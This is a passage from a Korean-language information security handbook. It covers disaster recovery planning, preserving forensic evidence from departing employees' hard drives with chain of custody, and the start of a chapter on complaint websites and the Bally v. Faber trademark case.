( EOC ) 와 고장싸이 트의 관리 유지 와 보안이다. EOC 에 대 한 접 근을 제 한하고 그것 을 깨 끗 
하고 어지럽지 않게 유지 하는것은 쎈터의 원활한 운영 에 도움이 될것 이 다. 

EOC 는 회복운영에 포함된 직원들의 가정과 접근회선을 가지고 있어서 그들이 통보 
를 전 달하거 나 새 로운것 을 수신 할수 있도륵 해 야 한다. 가정 적 문제 를 리 해 하고 해 결 하는 
것은 개인들이 회복노력에 집중할수 있게 하는데서 중요한 문제이다. 추가로 회사는 위 
기와 직접적으로 련관되지 않은 다른 종업원들에 대한 새로운 자료를 제공하는 자동전화 
대답기계와 전화회선을 가지고 있어야 한다. 이것은 또한 작업싸이트와 보고정보를 종업 
원 들에 게 중계하는데 리용될 수 있 다. 

재 해 복구운영 은 흔히 지 역 관리자의 정 상한계 를 초과하는 자금지 출을 동반한다. 승인 
과정 을 가속시키 고 일시 적 으로 소비한계 증가를 승인하는 지 령 사슬이 개 발되 여 야 한다. 
또한 위기로 영향을 받은 가정들이나 개 인들에게 보장될 선불금에 대한 지불장부처 리가 
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필요하다. 

위험관리그룹은 회사의 주요고객목록을 가지고 회사가 운영중에 있다는것과 개정된 
접촉방법을 알려 주어 전화문의가 즉시 이루어 질수 있도록 해야 한다. 이것은 고객들에 
의 한 계 약손실 또는 손상된 신뢰를 방지 할수 있게 한다. 

정리해고 


정리해고는 정보체계보안에 지금까지 막대한 영향을 주었다. 그것은 많은 직능을 통 
합하여 직무상구별을 없했으며 많은 사람들이 정확한 훈련이나 경험이 없는 과제들을 맡 
게 한다. 이 경우에 부적당한 문서화가 회사에 손해를 끼칠수 있다. 흔히 작은 일자리들 
이 없어 지면 직원은 해고된다. 보조부문사람들은 특히 정리해고대상으로 되기 쉽다. 그 
것은 그들이 하는 사업의 리익과 중요성이 잘 인식되지 않기때문이다. 

정리해고는 또한 회사에 대한 근로정신과 성실성에도 영향을 미친다. 정리해고제안 
이 회 사에 4주에 해 당한 생 산량의 손해 를 준다는 사실 이 평 가되 였 다. 이 때 정 보체 계보안 
전문가들은 보안에 위험을 주거 나 가능한 불만행위 에 대 하여 더 큰 주의를 돌려야 한다. 

다른 조사자료에 의하면 보통때 종업 원들중에서 10%가 회 사에 대 하여 사취할 기 회 
를 가지고 있는것으로 되여 있다. 정리해고기간에는 이것이 약 30% 정도로 늘어 날수 
있다고 한다. 


문 서 화 


문서화는 앞에서 론의하였지 만 여 기서 한번 더 설명할 필요가 있다. 어떤 고장후에 
또는 업무재개계획검사 및 재해복구노력 이후에는 즉시에 모든 문서화를 재검토하여 문 
서 화의 모든 개 선과 변경 을 기 록해 야 한다. 문서 화의 최 후변경 만 리용가능할수 있도록 
해 야 한다(이것은 문서들에 번호를 붙임으로써 달성될수 있다). 

부분적처리: 누가 우선권들 가지는가 


재난기간에는 모든 부서들이 우선권봉사를 요구한다. 그러나 그것을 관단하고 다중 
과제처 리를 조작할 여 유가 없다. 업무재 개 및 재 해 복구계 획을 개 발하는데서 필수적 인것은 
회 사의 어 느 부분에 첫 째 가는 주목을 돌려야 하는가를 결 정하는것 이 다. 많은 계 획 들에 서 
계획은 모든 업무과정들을 회복할수 있는 하드웨어 또는 처리능력을 포함하지 못한다. 
정확한것들이 회복되도록 해야 한다. 계획이 일단 개발되면 모든 관리자들은 서명을 하 
여 그들이 사고시 에 누가 첫 우선권을 가질것인가를 인식 하고 접수하도록 해 야 한다. 




주의해야 할 기타 재난 


위 험 관리 그룹과 모든 업 무재 개 계 획 작성 자들의 일상적 인 과제 는 회 사의 업 무과정 이 나 
재해복구계획에 영향을 줄수 있는 사건진행과정을 감시하는것이 다. 실례로 회사는 린접 
시설에서의 사고나 자기의 운영능력에 영향을 미치는 환경상위험에 대해서도 무심히 대 
하지 말아야 한다. 그러자면 재해복구계획에 영향을 미칠수 있는 재난진행과정에 대하여 
알고 있어야 한다. 이러한 한가지 실례는 세계무역쎈터에 대한 폭격사건이다. 몇주일후에 
구조물고장(폭설로 지붕까지 묻혀 버림)으로 인하여 자료센터를 잃어 버린 한 회사는 계 
약된 강력한 싸이트로 옮겨 갈수 없었다. 왜냐하면 그것은 이미 세계무역쎈터에서 온 다 
른 회사들이 리용하고 있었기때문이다. 만일 그 회사가 이에 대하여 주의를 돌리고 있었 
다면 이것이 자기의 재해복구계획에 영향을 미칠것이라는것을 알았을수 있으며 고장에 
대 처 하여 다른 싸이 트를 지 정 하는 조치를 취했을수 있 다. 

재해복구계획은 장기간에 대처할 필요가 있을수도 있다. 실례로 최근에 있은 강한 
폭풍으로 하여 일부 회사들의 공업전원이 몇주동안 차단된것을 들수 있다. 초기에는 업 
무운영을 다시 시작할수 있었지만 그들이 며칠동안의 예비전원만을 계획하였기때문에 그 
것을 계속 유지할수 없었다. 


요 약 


정 보체 계 보안전문가들은 업무재개 계 획화와 재 해복구분야에 서 관건적 인 역 할을 수행 
한다. 이것은 대부분의 정보체계 보안일군들의 정상의무에 서 급격히 리 탈하는것 이 다. 그들 
은 엄밀한 기술적 또는 체계적리해보다는 전체 업무과정에 대한 리해와 재난환경속에서 
어떻게 그 과정들을 지원하고 가능하게 할수 있는가에 대한 리해를 가질 필요가 있다. 
정보체계보안전문가들이 제공하는 학술적이며 전문가적인 충고는 또한 많은 기관，회사， 
대 리기관들이 자기들의 업무과정 을 침해 하고 급변하는 경쟁시 장에서의 생존을 위협 할수 
있는 사건들에 대처할수 있는 능력을 실질적으로 높여 줄것이다. 
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제 9 편 

법，조사 및 른리 


이 편에서는 콤퓨터사고조사와 전자우편과 인터네트의 리용에 대한 합법적리용측면 
에서 제기되는 몇가지 문제에 대하여 고찰한다. 

제40장에 서 는 기 관망과 정 보체 계 와 관련 한 범 죄 사건을 취 급하는 불쾌한 문제 를 론한 
다. 기 관이 범 죄 자를 기 소하는 능력 을 약화시 킬수 있는 그러한 오유를 피 하는것 은 매 우 
중요하다. 이 장에 서 는 상세한 콤퓨터법 률분석 과 증거 사슬고리 를 보호하는 보다 빠르고 
효과적인 분석방법을 언급한다. 제안한 단계에 따르면 실지로 무엇이 일어 났는가를 결 
정할수 있 는 가능성 이 커 진 다. 

제41장과 제42장은 오늘날 기관들이 당하고 있는 현존문제들을 서술한 최근의 사건 
들을 고찰한다. 첫 번째 는 인터네 트에 서 잘 알려 진 불평싸이 트에 대 한것 이 다. 이 싸이트 
들은 목표로 삼은 기관들을 곤경에 빠뜨리는데 그것은 그들이 고객，종업원，경쟁자，판 
매업 체들에 기 관에 대 하여 불만을 가지게 하기때 문이 다. 밸리 대 페 이버사건을 실례 로 
든다. 여기에는 페이버가 벨리의 상표를 도용한 사실이 포함되여 있다. 결론은 기관들이 
이 싸이트들을 평 가하고 거 기서 배워 야 한다는것 이 다. 이것은 보편적 인 골치거 리들이 증 
가한다는것 을 의 미한다. 

제42장에서는 비요청전자우편다량배포 즉 스팸문제를 어떻게 취급하는가에 대하 
여 론한다. 실례로는 워싱톤주와 헤켈사이의 소송사건을 들었다. 우의 실례에서 중심 
문제 가 언론의 자유문제인것 처 럼 이 소송건의 기 저 에는 워 싱론주의 스쟁방지 법 이 놓 
여 있다. 여기서는 많은 문제들이 취급되였으므로 이것들을 잘 알아야 앞으로 소송사 
건에 걸 려 들지 않을수 있다. 스팽현상은 우리 가 전자우편을 쓰는데 서 일정한 장애 가 
있을수 있으나 이것을 통제하는 방법은 아직 해결되여 있지 않으며 법정에서 더 론의 
해야 할것이다. 
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제 4 0 장. 무슨 사건인가 


켈리 제이 무츠타 


밤중에 시체와 범죄현장의 참상과 맞다들렸다고 상상해 보라. 사람들의 극도의 무질 
서와 혼란상태，어둡고 침침한 장소에서 연기가 자욱하고 어두운곳에 잔해가 가득 널려 
있다. 피해자들은 얼이 나가서 왔다갔다 하면서 서로 부딛치기도 한다. 구경하는 사람들 
과 호기심 많은 사람들이 주변에서 서로 억측도 하고 예측도 하느라고 싱갱이질을 한다. 
무슨 일이 일어 났는지 또 언제 일어 났는지 아는 사람은 아무도 없다. 다만 일이 일어 
났다는것만 안다. 경찰들이 짐작건대 오고 있는중인것 같다. 그런데 갑자기 누군가가 나 
에게 달려 오더니 나를 죄인으로 모는것이였다. 왜냐하면 내가 이 동네를 잘 알고 있기 
때문이였다. 이것은 예상외의 일이며 특히 그 범죄현장이 나의 망가까이에 있거나 나의 
정보체계와 관련되는 경우 더욱 그렇다. 

이 렇게 범죄 현장을 비 교하여 이 야기 하는것은 정보체 계와 관련된 법적해석 문제들이 
범죄 현장과 류사하기때 문이 다. 수십 년동안 텔레 비존에서 경 찰사건문제를 보아 왔기때 문 
에 사람들은 당신이 증거를 인정하지 않을것이라고 생각한다. 왜냐하면 범죄와 관련한 
귀중한 정 보들과 단서들이 본의 아니게 파괴되거 나 손상될수 있기때문이 다. 범죄 현장에서 
우리는 의료상방조를 필요로 하는 사람이 없는가를 알아 보아야 하며 그 다음에 전화를 
걸어 범죄 담당전문가들이 현장에 와서 사업에 착수하도록 해 야 한다. 

당신의 망에서 불상사가 일어 나고 사건이 일어 났다는것을 늦게 야 발견하고 과거의 
어느한 일에 대한 정보를 알 필요가 있다면 어떻게 하겠는가. 당신의 기관에 해당한 능 
력 이 있는 사람이 있다면 그 사람에게 그것에 대하여 빨리 알려 주며 또 그 범죄현장을 
그대로 보존할것을 바랄것이다. 

비상사태대응전문가들이 흔히 말하듯이 사고가 일어 난 직후에 내린 초기결심은 사 
건수사결과에 가장 큰 영향을 미친다. 오늘날의 정보체계에서는 대체로 징조가 나쁘다는 
외부적인 징후들은 외적으로 많이 나타나지 않는다. 사고에 대해서 가장 깊이 아는 사람 
들은 그 체계사용자들이다. 

비밀자료들을 절취하는 현상，콤퓨터를 다른데 악용하는 현상들은 더 자주 나타난 
다. 앞으로 사건처리를 사람들이나 회사들이 어떻게 해야 하는가에 대한 최선의 조언을 
준다면 그것은 세밀히 관찰할 필요가 있는 해당인원들의 보안관련움직임에 대한《행동 
방식모형》을 작성하는것 이 다(표 40_1). 의 심되는 경우 피 해 자의 콤퓨터 에서 하드구동기 
를 떼서 증거로 보존해야 할 필요도 있다. 하드구동기는 비싸지 않고 그것을 떼고 대신 
새 것 으로 설치하는데 드는 가동중지시 간은 얼마 되지 않는다. 이 렇게 하면 기관의 자금 
과 골치거리를 덜수 있다. 

기 업의 기밀부서 에서 사직한 사원을 생 각해 보자. 그 사원이 비 법적 이거 나 비륜리적 
인 어 떤 조작을 진행 하였 다면 사직한 때 로부터 30~60일동안까지 는 아마 그것 을 알아 차 
리지 못할것 이 다. 사직하거 나 뢰직 한 종업 원들이 쓰던 탁상형 콤퓨터 나 무릎형콤퓨터의 
하드구동기를 최소 60-90 일，가능하다면 더 오랜 기 간 보관하는것 이 좋다. 이 기 간이 끝 
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나면 그 디스크들을 깨끗이 청소하여 다시 리용할수 있을것 이다. 왜 그런가하면 일단 하 
드디스크와 그안의 자료가 초기화되여 다른 사람들이 쓰게 되면 그 사건수사에 쓸수 있 
는 자료들을 수복할 가능성 이 거의 없어 지며 투하해 야 할 시간과 자금은 모자랄것 이기 
때문이다. 


표 40 — 1 행동방식모형 


종 업 원 

위험점수 
에 : 1 

아니 : 0 

무게 

100% 

무게 점수 

기밀정보를 다투었는가. 

1 

5% 

0.05 

나쁜 마음을 먹고 사직하였는가. 

0 

20% 

0 

경쟁자에게 일해 주러 갔댔는가. 

1 

20% 

0.2 

미해명사건에 련관될수 있었는가. 

0 

5% 

0 

예상치 않게 사직하였는가. 

0 

10% 

0 

그의 행동이 소송에 걸려 들수 있는 가능성이 있었는가. 

0 

25% 

0 

기관이 비밀정보수집의 대상으로 된적이 있는가. 

1 

15% 

0.15 

증거보존점수 



40% 


증거보폰의 지침 

0-24% ; 증거를 보존할 필요가 명백치 않다 
25-49% ; 증거 를 보존할 러유가 충분하다 
>49% ; 증거 를 보존할 리유가 강하다 

대부분의 경우에 증거가 오손된것은 몰라서 그렇게 한것이지 의도적인 기만행위에 
의한것 은 아니 다. 나는 사건 이 일 어난후에 자기 들의 조사솜씨 를 발휘하려 고 하는 회 사나 
개 인들이 체 계관리 자들로 하여금 실마리 나 흔적 을 찾게 하는것을 목격하였 다. 어떤 한 
사건에서 그들은 증거자료를 발견할수 있었는데 정보를 발견한후 그들은 그 파일을 열고 
그것을 플로피디스크에 보관하였다. 이 행위는 기본열쇠로 되는 날자를 변경하고 전자증 
거 를 손상시 켰으며 결국 법 정 에서 리용할수 없게 하였 다. 

콤퓨터법 정전문가들은 체 계날자를 관건적 인 정 보로 본다. 창조，마지 막쓰기，마지 막 
접 근날자는 과거 에 무엇 이 일 어 났는가에 대 한 중요한 견해 를 주는 사건순차를 확립하는 
데 리용된다. 콤퓨터법정학문에서는 콤퓨터법전문가들이 날자를 비롯한 임의의 증거들을 
변경시키지 말아야 한다고 지적하고 있다. 의심스러운 체계의 자료를 조사할 때 조작체 
계 가 하드구동기 에 자료를 쓰지 않도록 최 선을 다해 야 한다. 비 록 당신이 콤퓨터법 전문 
가가 아니 라고 해도 당신은 원래의 증거를 보존함으로써 자기 회 사가 범죄 에 대 처할수 
있도록 해야 한다. 

콤퓨터 가 기 동할 때 조작체 계 는 즉시 체 계의 많은 파일날자를 변경하거 나 수정한다. 
실지 그 파일개수는 기관이 어떤 체계，항비루스응용프로그람，망규약을 리용하고 있는가 
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에 관계 된 다. 표준적 인 Windows 98 체 계 들은 12,000개 이 상의 파일 을 관리한다. 기 동과정 
에 수백 개 의 파일들이 POST(Power On Self Test ) 기 간에 변화될수 있 다. 

항비루스응용프로그람이 설 치된 경우에 는 악성코드를 제거하는것 이 곧 그 파일을 변 
경 시 키 는것 으로 된 다. 이 과정 은 마지 막접 근 및 마지 막쓰기 날자를 변화시 킨다. 

가능한껏 많은 선택 을 리 용할수 있게 하기 위하여 적 당한 시 간동안 하드구동기 를 떼 
여 놓아야 한다고 생각된다. 만약 당신이 매 하드구동기를 검사상태로 놓는것을 잠재적 
인 비 용때 문에 할수 없 다면 그것 을 제 한된 기 준하에 서 실 행할수 있 다고 생 각된 다. 이 미 
나는 하드구동기 를 보관해 야 할 필 요가 있는 퇴 직 사원 에 대 한 행 동방식모형 을 개 발할것 
을 언급하였 다. 그 목적 은 앞으로 콤퓨터 의 하드구동기 를 조사할 필요를 지 적하는 예 측 
수단을 얻자는것이다. 

나의 경험 은 인간의 행동이 수자식범죄 현장에서 고려되 여 야 할 중요한 예측수단이 라 
는것 을 보여 준다. 매 개 기 관은 사실 상 경 고와 갈은 각이한 행 위 들을 체 험한다. 매 개 기 
관들은 그 수준에 맞는 자체의 행동방식을 개발할 필요가 있다. 이 경우에 과거의 사건 
은 미 래의 사건에 대 한 가장 좋은 지시 자이다. 고려해 야 할 정 보원천은 합법 적 인 기관이 
나 업무단위 그자체는 물론 인적자원，공동조사，정보보안이다. 

당신의 행 동방식 모형 에 고려해 야 할 요인들은 다음과 같다. 그 사원 이 기 밀 자료를 
다투었는가，사직이 뜻밖이였는가，퇴직이 법적소송을 일으킬것 같은가，사원이 경쟁자를 
위해 일하려 하지 않는가，사원 이 접 촉한 기 관과 관련 한 어 떤 사건 이 없 었 는가，그가 왜 
떠나려 고 하는지 애매한 점 은 없는가. 우의 임의의 물음에 대 해 《 예》라는 대 답은 최 소 
한 적 당한 기 간 하드구동기 를 보존할 필 요성 을 제 기 할것 이 다. 

나는 사원 혹은 이 전의 사원문제 를 취 급할 때 《 나는 그 사람에 대 하여 의 심스러 운 
점 이 있다는것 을 알았다!》라는 말을 자주 듣는다. 이 밖에도 경시한 다른 문제들이 있는 
데 모든 요인을 고려해 보면 기 관들이 경 고징 후들을 놓쳤 다는것 을 돌이 켜 보게 된 다. 경 
고들은 일반적으로 인적자원，공동조사，업무단위，정보보안을 비롯하여 여러 령역에 퍼 
져 있다. 

인적 자원과 업무단위는 개 인의 행동이 나 사원이 떠나려 고 하는 가능한 원인에 대 한 
열쇠를 가지고 있다. 공동조사는 외부사건이나 지적정보에 대한 견해를 줄수 있다. 이것 
은 알려 지지 않았지만 조사중에 있는 사건，사적경영정보를 얻기 위한적수의 기도 그 
리 고 다른 가능한 관련문제 를 포함한다. 정 보보안은 개 인들이 최 근에 표현한 의 심스러 운 
행위에 대한 어떤 정보를 가질수 있다. 의심스러운 행위의 실례로서는 기밀자료에 대한 
접근기도，방대한 자료의 복사，기술오용의 변명，의심스러운 인터네트싸이트에 대한 열 
람 등이다. 

내 가 목격한 가장 좋은 방법 은 사원퇴 직 과정 을 맡은 인사과직 원들이 우에 서 말한 세 
개의 그룹에 통보하게 하는것이다. 그들은 매 그룹에 적당한 시간을 주어 금지된 기간 
하드구동기를 보존하거나 구체적인 사건과 관련되는 즉시적인 분석을 요구할수 있다. 물 
론 인사과직 원은 자기 들의 정 보에 기 초하여 직 접 요청할수 있 다. 

신입직원들을 가르치는데서 《허용되는 사용》방책이 가지는 중요성을 잊지 말아야 
한다. 뢰 직하는 사원들이 자기 들의 콤퓨터 를 반환하려 고 할 때 그들에 게 무엇 을 할수 있 
고 무엇을 할수 없는가를 지시해 야 한다. 업 무요구와 수준에 따라 당신은 사원들의 밀기 
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(wipe) 편의 프로그람(특히 비 표준제 품) 혹은 법 정 결과를 방해할수 있는 다른 제 품들의 사 
용가능성을 제 한하는 방책을 확립할수 있다. 비록 이것 이 기 업들에서 론의하기 어 려운 
문제라 하더라도 이것은 매우 사활적이다. 나는 약간의 불만을 품은 사원이 고의적으로 
유용한 의뢰기정보를 지우고 편의프로그람을 써서 그 정보를 회복할수 없게 만든 사건을 

여러번 보았다. 설사 이 문제에 대한 방책이 없다고 하더라도 당신은 리성적인 판단을 

내려야 한다. 

당신의 기관에 알맞는 방법을 개발하기 위해서는 우에서 지명한 개별적사람들과 
당신의 변호사로부터 정보를 엄어야 한다. 만약 그 사원이 로조성원이라면 특수한 규 

정 을 적 용할수 있 다. 또한 주의 법 에 기 초한 혹은 기 관이 정 부와의 계 약을 리행하는 

가에 대한 특수한 고려가 있을수 있다. 보존된 증거는 아마도 호출장과 함께 제출될 
것 이 다. 당신의 변호사는 당신이 어떤 법 적 요구를 주장해 야 하는가를 결심하도록 할 
것 이 다. 

우에서 말한것과 비슷한 방법을 받아 들인다고 가정하자. 기관은 하드구동기를 
보존하기 로 결심하였다. 당신은 그에 대 해 어 떻게 하려는가. 기 본관심사는 련속적 인 
보관을 확립하고 특수한 세부내용을 문서화하고 하드구동기를 안전하게 유지하는것 
이다. 만약 당신이 보존한 전자증거가 법정에 제출될 기회가 있다면 이 모든것은 극 
히 중요하다. 

당신은 련속적 인 보관을 확립하여 인증을 확인하고 증거 위 조라는 주장을 반박해 
야 한다. 만약 당신이 그 증거 가 당신의 관리 하에 있 었 다는것 을 증명할수 없 다면 당 
신은 유죄증거 를 위하여 변경 되거 나 수정 되지 않았다는것 을 증명할수 없 다고 많은 
변호사들은 공격할것 이 다. 련속보관을 확립 하기 위하여 당신은 문제 가 해 결될 때 까지 
수집한 순간부터 입수물을 문서 화해 야 한다. 여기 에는 법정체 계를 통한 상소과정 이 
포함된다. 

문서 화과정 의 일 부로서 증거 가 발생한 본래 의 PC 에 대 하여 가능한껏 많은 세 부내 용 
을 식 별하여 야 한다. 이것은 중요하다. 왜 냐하면 몇개의 관건적 인 정 보가 알려 지는 경우 
후에 완성된 분석 이 훨씬 원활하게 될것이기때문이다. 다음과 같은 문제들이 문서화되 
여 야 한다. 

• 하드구동기에 어떤 조작체계가 있는가. 

• 기 타 체 계 명 세 는 무엇 인 가 (RAM, SCSI, IDE; 처 리 기 형 태 ). 

• 구동기분할 (Partition) 이 어떻게 되여 있는가. 

• 하드구동기에 어떤 응용프로그람이 있는것으로 알고 있는가. 

• 어 떤 암호화가 리용되 는가. 

• 알려 진 통과암호，열쇠，인증서목록이 있는가. 

• 하드구동기의 소유자는 어떤 체계에 접근하고 있는가. 

• 하드구동기는 어떤 형태의 체계에서 만든것인가(제작업체，모형). 

• 보수경 과기 록을 비 롯한 하드웨 어문제 들에 대 한 기 록이 있는가. 

이 질문들에 대답을 주면 법정분석이 훨씬 빨라 지고 효과적인 과정으로 될것이다. 
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1 차경과기록은 그것이 수집된 때로부터의 증거를 동반해야 한다. 그것은 날자와 시 
간，상세한 증거자료서술，누가 증거를 포착하였는가 등을 포함해야 한다. 경과기록은 또 
한 보관부서에 전송되여야 하며 거기에는 전송리유와 방법(인편전달)，발송자와 날자(전 
송자의 서명과 날자)，접수자와 날자(접수자의 서명과 날자)가 포함되여야 한다. 증거를 
보관하고 있는 사람들은 그 증거가 자기들의 수중에서 안전하게 보호된다는것을 증명할 
필요가 있다. 

안전한 장소는 접근이 제한되는 페쇄 가능한 용기 이 다. 그것은 자물쇠 가 있는 파일보 
관장，금고，증거보관함，지어는 쇠를 잠그는 방일수 있다. 가장 좋기는 그 증거에 꼭 한 
사람만이 접근하게 하는것이다. 그것이 불가능하다면 증거를 제한된 구역에 기억시키고 
그 구역에 접근하는 사람을 다 문서화하여야 한다. 증거에 보다 많은 사람이 접근할수록 
그것은 보다 많은 사람이 증거를 변경시키지 않았음을 증명해야 한다는것을 의미한다. 
단일접근을 허용하는 페쇄용기를 준비하는것은 다중접근용기보다 더 쉽다. 만일 증거를 
규칙적으로 안전하게 보존하려 한다면 증거보관함을 구입하여야 한다. 증거보관함은 보 
관하고 있는 증거 에 대 한 1차경과기록도 포함해 야 한다. 증거 가 보관되면 그것은 등록되 
여야 한다. 증거가 제거될 때마다 보관은 개인들에게 전송되여 제거되여야 한다. 우에서 
보여 준 경과기록들에 대한 설계를 여기서 리용할수 있다. 이 경과기록의 목적은 증거보 
관함이 접촉될 때마다 매번 문서화하는것 이며 특정한 증거에 대한 문서화를 지원하는것 
이다. 

증거를 다른 곳으로 보낼 필요가 있다면 그 보관에 대 한 문서화를 보장할수 있는 려 
행 안내 자봉사를 리용하는것 이 좋다. 여기 에는 형식과 개수를 추적 하는것도 포함되여 야 
한다. 전통적 인 송달봉사의 대부분은 이 봉사를 제공한다. 송신자들은 짐함을 밀봉해야 
하며 수신자들은 그것이 터지지 않았는가를 관찰해야 한다. 추가적인 보호로서 증거를 
용기 안에 밀페하여 수신자가 그 문서가 위조되지 않았음을 증명할수 있도록 해주는것이 
필요하다. 전송도중에 증거를 보호하기 위한 합리적 인 조치들을 취해 야 한다. 증거가 손 
상된다면 그것은 거의 쓸모 없게 된다. 

이런 단계들을 거치면 지난 기간에 무엇이 일어 났는가를 결정하기가 쉬워 질것이다. 
력사가 미래를 변화시키 리라는것을 리해하는것 이 최종적 인 목적 이 다. 력사를 리해하기 
위하여 우리는 훌륭한 정보를 가지고 있어야 한다. 정보를 보존하기 위하여서는 콤퓨터 
법률전문가로 될 필요까지는 없고 다만 그 과정을 리해하고 왜 그것 이 중요한가를 리해 
하면 된다. 또한 회사가 효률적 인것으로 되게 하며 《무엇 이 일어 났는가》에 대 한 좋은 
정보를 가질수 있도록 실천기술에 숙련하여 야 한다. 
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제 4 1 장. 인테 II 트불평싸이트와 
밸리 대 페이버사건 


에드워드 에이취 프리맨 


어느 큰 기관들에나 다 불만을 품은 사원들과 의견 있는 고객들이 있다. 최근까지만 
하여도 불만 있는 사람들은 자기의 불평을 흔히 친구들이나 동정하는 사람들에게 털어 
놓는것이 고작이였다. 기관들에서는 그 불평을 공개적으로 거부하면 오히려 그 불평에 
사회적 으로 더 관심 이 집중될가봐 무시 하는 경우가 많았다. 

인터네트의 폭발적인 증가로 하여 의견 있는 고객들이 기관들을 비판하기가 더 쉬워 
졌고 그들의 신소를 더 많은 사람들이 쉽게 듣고 볼수도 있게 되였다.〈〈불평싸이트》는 
인터네트에서 평범한것으로 되였다. 거의 모든 큰 기관들과 보다 작은 많은 기관들이 이 
불평싸이트의 대상이 되였다. 이런 싸이트들에는 싸이트운영자의 불만뿐아니라 의견 있 
는 고객들，사원들，경쟁자들 지어 관매 업자들도 그 기관에 대한 고소장을 게시 하는 정도 
이다. 기밀적인 내부문건들도 이러한 Web 폐지들에 나오고 있다. 어느 회사의 고객으로 
되려는 사람들과 직업을 얻으러는 사람들은 그 회사와의 거래건이나 제공하는 직업을 받 
아 들이기전에 득 이 싸이트들을 방문하고서야 결심을 채택 하군 한다. 이런 싸이트들은 
매 달 수천건의 대 인기글들을 받군 한다. 

비록 작지만 이 불평싸이트들은 큰 회사들 지어 누구도 어쩌지 못한다는 대규모회사 
들에도 큰 골치거리로 될수 있다. 인터네트의 공개적성격에 의하여 콤퓨터 한대와 불평 
할것 만 있 으면 100딸라미 만으로 나른 이 름을 가진 Web 싸이 트를 하나 구매할수 있 다. 싸 
이트들에 게재되는 신소장들은 추적이 불가능하게 되여 있으므로 그것이 진실인지 아닌 
지를 확인해 볼수 없게 되여 있다. 

이 장에 서 는 밸 리 대 페 이 버라는 불평 싸이 트들을 둘러 싼 1998년 련방재 판소 판결을 
보기로 한다. Bally Total Fitness 라고 하는 전국적인 망의 운동구락부는 자기의 등록상표 
명을 부정적으로 사용하고 있는 어느 한 인터네트싸이트를 닫아 치우려고 시도하였다. 
여기서는 주로 상표사용권위반문제와 상표희석화문제를 보기로 하자. 이 글 전반에서는 
실지 법정사건들을 실례로 리용하였다. 

밸리 대 페이버사건의 진상 


Bally Total Fitness (그림 41-1 참고)는 쉬 카고우에 국제 적 인 본부를 두고 있는 뉴욕 
주식 시 장의 한 회 사이 다. 밸리 회 사는 국내 에 27개 주와 카나다에 360개 소의 시 설을 둔 근 
4백 만의 성 원들을 망라하고 있는 북아메 리 카에서 가장 큰 영 리기관으로서 건강체육구락 
부들을 운영하고 있다. 
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ballyfitness.com 

그림 41-1. 밸리의 마크 

워싱톤시에 사는 사진업자이며 Web 설계가인 앤드루 페이버와 밸리회사사이에 분쟁 
이 있었다. 분쟁 문제 를 자기 에게 유리하게 해결하지 못한 그는 《Bally Sucks 》 (밸리는 
이렇게 빨아 먹는다)라는 Web 싸이트를 개설하고 운영하였다. 그 싸이트는 밸리에 대한 
소비 자들의 불평 을 담는 전용싸이 트로서 그들이 밸 리 건강체육구락부 성 원이 기를 그만두 
려면 어떻게 해야 하는가에 대한 사항까지 알려 주었다. 페이버의 싸이트는 밸리회사가 
아닌 다른 회 사에 대 한 불만을 가진 고객 들도 자기 들의 이 야기 를 하도록 적 극 장려하였 
다. 그러 던중 어떤 Web 써 퍼 ( surfer ) 가 그 싸이 트를 방문했는데 거 기 에는 밸 리의 뚜렷 한 
상표(그림 41一 1) 가 나타나고 그우에 두드러지게 sucks (빨아 먹다)라는 글이 나타나는것 
이였다. 스크린의 밑부분에는 《Bally Total Fitness Complaints ! Un - authorised 》(댈리건강 
체육구락부불평 마당) ( Un-authorised 는《허가를 받지 않은》이라는 뜻도 있으나《저자 
가 없는》이 라는 뜻도 나온다-역 주)라는 글도 있는것 이 였 다. 

1998년 2월 밸리회 사는 캘 리포니 아주의 련방재 판소에 페 이버를 기소하였다. 밸리는 
자기의 상표를 페 이 버 가 사용중지할것을 요구하였다. 밸리 는 페 이버의 Web 싸이트가 상 
표권침 해，부정 경 쟁，상표희 석화를 방지하는 법 률을 위 반하고 있다고 주장하였다. 4월에 
법정은 페 이버 에 대 한 림시억제명 령을 밸리 가 신청한데 대 하여 기각하였다. 

11월에 법정은 밸리에 대한 략식판결을 할데 대한 페이버의 신청을 승낙하였다. 략식판 
결은 〈〈물질적사실에 관한 진정한 소재가 없으며… 신청자측이 법률상 재판할 권리가 있 
는》경우 재판소들에서 리용하는 수법이다. 략식판결신청제기를 승인함으로써 법정은 밸리의 
주장이 모두 사실 인 경우라 하더 라도 그 사실들만 가지 고는 벨리의 소송사건을 증명할수 없 
다고 주장하였다. 밸리는 평결을 하소하였으나 련방재판소의 판결이 나오기전에 쌍방이 문제 
해결을 타결 지 어 페 이버 가《밸 리는 빨아 먹는다》라는 자기의 Web 싸이 트를 철회 하였다. 
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상표법 개 관 


상표란 판매자가 자기의 제품에 붙여 그 생산지를 식별하여 그 상품을 다른 상품들 
과 구별하는 뚜렷한 그림 이 나 단어 이 다. 상표법은 다음의것을 포함한 많은 식별형 태들을 
보호 한다. 

• Kodak 나 Exxon 과 같은 고안된 단어 들 

• Heinz Ketchup 유리 병 과 같은 뚜렷하며 고유한 포장용기 

• 독특한 색배 합 (Kodak 필 림의 노란색 과 붉은색의 배 합；) 

• 건축도안 ( McDonald 간이 식 당의 황금아치 형앞문) 

• 고유한 로고 ( logo ) 와 상징 물 ( IBM 의 상징 이 나 Kellogg 사의 붉은 K 자) 

1946년 국회 는 상표를 규제 하기 위하여 《 란함법 (Lanham Act )》 을 통과시 켰다. 주들 
사이의 호상 상업무역 을 규제할데 대 한 헌법적권리밑 에 국회는 이 법을 발효시 켰다. 이 
법 에 준하여 등록된 상표는 련방보호를 받는다. 당사자들은 완성상표나 상표계획 안을 특 
허 및 상표국에 등록할수 있으며 국에서는 이 것을 검 열관들이 초기비준하면 특허 및 상 
표국국지 에 공개한다. 이 목적은 다른 대 방들로 하여금 최 종비준을 예 비적 으로 통지하게 
하는것 이 다. 상표분쟁 문제 를 해 결 하기 위 해 서 는 많은 법 적 선 택 사항들이 제 기 된 다. 

이 법은 또한 상표로 법적등록을 할수 없는 일련의 마크에 대 해서도 언급하고 있 
다. 그것들은 다음과 갈다. 

• 통칭 적 이거 나 지명 이 붙은 상품의 이름(실례 로 Maine Potatoes 는 그 어 느 개 인의 
상품명 으로 등록될수 없다. 이 단어들은 그 어느 개 인제품을 가리키는것 이 아니 
라 메인주에 서 생 산되 는 감자전체 를 가리킨다. 그러 므로 Johnson's Maine 
Potatoes 라고 하면 상표로 등록할수 있다). 

• 본인의 승인이 없는 산사람의 이름，초상，서명 

• 주 또는 시의 기발 

상표의 소유주는 그 상표에 대 한《 전용권》을 담보 받기 는 하지 만 그 전 용권에도 
